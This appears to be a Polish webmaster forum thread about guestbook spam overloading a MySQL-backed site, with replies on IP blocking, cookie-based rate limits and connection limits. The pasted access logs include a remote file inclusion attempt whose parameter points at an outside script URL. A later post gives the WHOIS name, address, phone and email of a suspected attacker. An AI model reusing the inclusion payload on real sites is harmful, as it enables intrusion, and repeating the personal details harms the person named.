Atak na serwer

[pseudoseowiec]

Mam bardzo ciężki pakiet skryptów oparty o mysql. Serwis śmigał bardzo dobrze do puki ktoś nie zaczął spamować księgi gości. Od tego czasu cały serwis padł podając komunikat o tym, że baza danych jest przeciążona i że jest za dużo zapytań do tej konkretnej bazy.

Co wykonałem.

- wyczyściłem plik guestbook.php dodając do niego przekierowanie

<?php
header("HTTP/1.1 301 Moved Permanently"); // ta linjka powie googlebotowi, że ustawiono przekierowanie 301 
header("Location: https://jakasinnastrona.com);
?>

- zoptymalizowałem wszystkie tabele w bazie w phpmyadmin

przykład wejść, IP zmienne

Host: 213.163.65.163


*  


/guestbook.php?owner=1
Http Code: 301 	Date: Apr 11 11:03:27 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: https://domena.pl/guestbook.php?owner=1&action=show_add
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)




Host: 213.163.65.73


*  


/guestbook.php?owner=27&action=show_add
Http Code: 301 	Date: Apr 11 10:44:01 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





*  


/guestbook.php?owner=2&action=show_add
Http Code: 301 	Date: Apr 11 11:02:10 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





*  


/
Http Code: 200 	Date: Apr 11 11:02:14 	Http Version: HTTP/1.1 	Size in Bytes: 257
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)




Host: 213.163.65.177


*  


/guestbook.php?owner=1
Http Code: 301 	Date: Apr 11 11:01:54 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: https://domena.pl/guestbook.php?owner=1&action=show_add
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)




Host: 85.119.76.136


*  


/
Http Code: 200 	Date: Apr 11 11:01:18 	Http Version: HTTP/1.1 	Size in Bytes: 257
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)




Host: 67.228.201.146


*  


/guestbook.php?owner=1&action=show_add
Http Code: 301 	Date: Apr 11 11:01:08 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)




Host: 94.102.51.184


*  


/guestbook.php?owner=2
Http Code: 301 	Date: Apr 11 11:00:17 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: https://domena.pl/guestbook.php?owner=2&action=show_add
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Jak taki robota nie wpuszczać na serwer?

[pseudoseowiec]

Dupek próbuje jeszcze takich chwytów:

Host: 217.118.24.76

*

/index.php?tags_mode=photo/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=https://www.sanctamaria-aarsc

Http Code: 200 Date: Apr 11 10:56:35 Http Version: HTTP/1.1 Size in Bytes: 257

Referer: -

Agent: Mozilla/4.8 [en] (Windows NT 5.0; U)

*

/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=https://www.sanctamaria-aarschot.be/smarts/osy2.txt?

Http Code: 404 Date: Apr 11 10:56:35 Http Version: HTTP/1.1 Size in Bytes: -

Referer: -

Agent: Mozilla/4.8 [en] (Windows NT 5.0; U)

[Mich@ł]

Zapewne serwer pluje sie o ilość aktywnych połączeń do MySQL Ja u siebie na dedykach mam ten problem bardzo często i jedynym rozwiązaniem bylo zwiększenie limitów np na 500 połączeń

Od tego czasu nie blokuje sie juz MySQL

[pseudoseowiec]

Serwis nie stoi na dedyku Czy to się zmienia w php.ini czy trzeba walic do firmy hostingowej?

[gielo]

jak ataki masz non stop z tego samego ip zablokuj go i po problemie. Gorzej jak to bardziej kumaty koleś lub jakiś dzieciak korzystający z neostrady czy jakiegoś innego adsla ze zmiennym ip.

Wtedy tylko telefon do admina hostingu z prośbą o namierzenie i zablokowanie delikwenta w trochę inny sposób.

[pseudoseowiec]

@Mich@ł a jak zwiększyłeś limit?

[Mion]

Pseudo algorytm:

- Na stronie wejściowej wystawiasz ciacho sprawdzające czy akceptuje ciacha;

- w kodzie dodawania wpisu do bazy spraszasz czy akceptuje ciacha oraz czy może dodawać pod kontem blokady czasowej. Jeśli może dodaje i wystawiasz cicho o czasie życia powiedzmy 24 H. Jeśli będzie chciał dodać z tego samego kopa, ale o innym ip to ważne cicho czasowe zablokuje taką możliwość przed upływem tych 24H. Jeśli wyłączy akceptacje cookie też nie doda

if(akceptuje_ciacha)

{

if(!sprawdzasz_ciacho_czasowe)

{

Dodaje WPIS;

wystawiasz_ciacho_czaowe_time()+3600*24;

}

}

Można to też obejść jak zobaczy, że taki mechanizm jest i będzie znał się na rzeczy. Poza tym można zastosować capha itd.

Ale jeśli masz za dużo połączeń to nie jest wina jednego dodawacza, bo musiał by mieć napisane oprogramowanie które wielowątkowo wysyłało by n żądań POST w ciągu sekundy na adres odbiorcy formularza od księgi gości.

[intruder2600]

A ja namierzylem tego, co wrzuca iframe:

Domain Name: GOOOOGLEADSENCE.BIZ

Registrant ID: DI_2408376

Registrant Name: Julia Taukova

Registrant Organization: N/A

Registrant Address1: mustamae 4-11

Registrant City: Tallin

Registrant State/Province: Harjumaa

Registrant Postal Code: 14865

Registrant Country: Estonia

Registrant Country Code: EE

Registrant Phone Number: +37.2953412

Registrant Email: donorsi@yahoo.com

Pytanie - co z takim zrobic ? Tez mi tego nawrzucal na jeden serwer...

[Mion]

Co więcej, jeśli generujesz za duże obciążenie bazy firma może wyłączyć ci hosting, bo tracą na tym i inni userzy tego współdzielonego serwera

[Mich@ł]

@Mich@ł a jak zwiększyłeś limit?

my.cnf :)Jednakze wymagany jest dedyk

Zobacz z jakiego zakresu IP jest najwiecej wejść i zablokuj na pare godzin ten zakres to sobie da spokoj

[slawek22]

Zwiększenie limitu to też nie zawsze dobry pomysł. 500 połączeń do bazy to minimum 500 działających procesów apache. Jak masz mało pamięci to sobie sam w ten sposób DDoS'a zrobisz. Czasami lepiej jeśli serwer odrzuci kilka żądań niż go przeciążać.

Lepiej: sprawdź w guestbook.php czy jest ustawione ciastko, jeśli nie -> redirect na pustą stronę która ustawi ciastko + redirect spowrotem. Wada: podstrona wyleci z google.

[Mion]

Tak poza tym to ten cały opis problemu jest bez ładu i składu. Wkleiłeś jakieś tam dane z których wynika tylko tyle, że były jakieś żądanie GET, a do tego w pewnym przedziale czasowym z różnych IP.